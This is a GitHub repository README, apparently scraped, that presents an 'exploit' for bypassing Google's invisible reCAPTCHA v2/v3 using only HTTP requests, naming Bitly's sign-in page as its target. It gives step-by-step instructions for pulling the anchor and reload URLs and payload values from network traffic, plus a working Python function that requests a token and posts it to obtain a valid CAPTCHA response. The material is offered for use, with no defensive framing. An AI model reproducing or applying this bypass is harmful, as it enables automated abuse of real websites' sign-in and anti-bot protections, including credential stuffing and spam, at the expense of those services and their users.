Skip to content

Exploit to bypass invisible recaptcha only with HTTP requests.

Notifications You must be signed in to change notification settings

blaannk/Recaptcha-Invisible-Bypass

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 

Repository files navigation

Bypass Invisible Recaptcha v2 / v3

Allows to bypass an invisible recaptcha just with HTTP requests, without Selenium or OCR.

Important

1 - This bypass does not work on all invisible recaptchas, you have to try it to know if it works on your recaptcha;

2 - This bypass only works on invisible recaptchas.

3 - You must have some knowledge of HTTP requests to understand

EXPLOIT

TARGET : https://bitly.com/a/sign_in

STEP 1

Inspect network to find the recaptcha anchor url.

STEP 2

Inspect network to find the recaptcha reload url.

STEP 3

Let's now look at the payload of the reload request

1 - Find CHR [xx, xx, xx] (2023 : no longer required, you can leave it blank in the script)

2 - Find VH (The number sequence after the character *) (2023 : no longer required, you can leave it blank in the script)

3 - Find BG (Not me :D, the other BG inside the payload from the character ! to the character *) (2023 : no longer required, you can leave it blank in the script)

Starts here

Ends here

STEP 4

Run bypass.py with python3 and fill inputs.

Recaptcha is vulnerable :D we can generate the recaptcha response with HTTP requests !

STEP 5

Go in the bypassed.txt file, take the variables and you can now create your script to generate the recaptcha response.

Generate Recaptcha Response

import requests

def generateresponse(anchorurl, reloadurl, payload):
    s = requests.Session()
    r1 = s.get(anchorurl).text
    token1 = r1.split('recaptcha-token" value="')[1].split('">')[0]
    payload = payload.replace("<token>", str(token1))
    r2 = s.post(reloadurl, data=payload, headers={"Content-Type": "application/x-www-form-urlencoded"})
    try:
        token2 = str(r2.text.split('"rresp","')[1].split('"')[0])
        return token2
    except:
        return ""

2023 update : You can just send the token retrieved using the GET request to the anchor url and it will still work.

Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

Please make sure to update tests as appropriate.

Credits

blank <3

About

Exploit to bypass invisible recaptcha only with HTTP requests.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages